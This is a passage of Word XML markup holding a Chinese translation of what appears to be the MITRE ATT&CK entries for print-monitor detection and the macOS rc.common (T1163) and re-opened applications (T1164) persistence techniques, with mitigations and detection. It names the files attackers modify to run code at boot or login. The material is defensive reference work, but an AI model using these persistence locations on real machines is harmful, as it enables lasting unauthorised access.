    <w:p w14:paraId="4F0FA572" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>观察</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与已知良性软件或补丁无关的新动态链接库写入到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264AED84" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>监控注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2386B866" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实用程序，该实用程序检查用于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>持久性机制的注册表项。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025CD38F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008411D6">
        <w:t>Rc.common</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="603A12D7" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2CD8C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> T1163</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59847314" w14:textId="20E604AC" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493FA6A0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29E8123B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> root</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47102D90" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52B0B5C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F2A28" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F311F">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F311F">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EF1BEDD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="0B33E853" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="000F311F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>动过程中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>source /etc/rc.common</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>这是一个包含各种实用程序函数的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>脚本。此文件还定义了用于处理命令行参数和收集系统设置的例程，因此建议包含在启动项脚本的开头中。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> macOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> OS X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中，这是一种弃用的技术，有利于启动代理和启动守护进程，但目前仍在使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616468EE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> rc.common </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件来隐藏持久化的代码，该代码将在每次重新启动时以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>用户执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641A55D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3393"/>
        <w:gridCol w:w="6343"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00FF6876" w14:paraId="789FAADA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="615B0738" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7C30D671" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00FF6876" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF6876">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w14:paraId="4DF8A924" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206A6C80" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F311F" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId67" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="000F311F">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户帐户管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD1355B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
                <w:color w:val="39434C"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>限制用户权限，以便只有授权用户可以编辑</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> rc.common </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
                <w:lang w:val="zh-Hans"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
                <w:color w:val="39434C"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="577DB60C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDE0C0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009431E8" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>/etc/rc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>common</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件，以检测公司策略的更改。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> rc.common </w:t>
      </w:r>
      <w:r w:rsidRPr="009431E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>脚本生成的异常或未知应用程序或行为的进程执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63D8EC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009431E8" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7085D842" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="008411D6" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97301">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新打开应用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w14:paraId="4B5B6E86" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59C64600" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F2A28" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F2A28">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2A28">
              <w:t xml:space="preserve"> T1164</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="267848BD" w14:textId="4FD4265B" w:rsidR="000F2665" w:rsidRPr="000F2A28" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2A28">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="000F2A28">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F8B5339" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F2A28" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F2A28">
              <w:t>平台：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2A28">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F04A65F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="000F2A28" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F2A28">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000F2A28">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="006F5D50" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="000F2A28">
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DABE7D2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="16E919C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00E92C11" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mac OS X 10.7 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>Lion</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>开始，用户可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>指定在用户重新启动计算机时重新打开的某些应用程序。虽然这通常是在应用程序的基础上通过图形用户界面</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>GUI</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）完成，但有属性列表文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>包含此信息，以及位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/Library/Preferences/com.apple.loginwindow.plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92C11">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078E29B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以直接修改这些文件之一，包括指向其恶意可执行文件的链接，为每次用户重新启动其计算机时提供持久性机制。</w:t>
      </w:r>
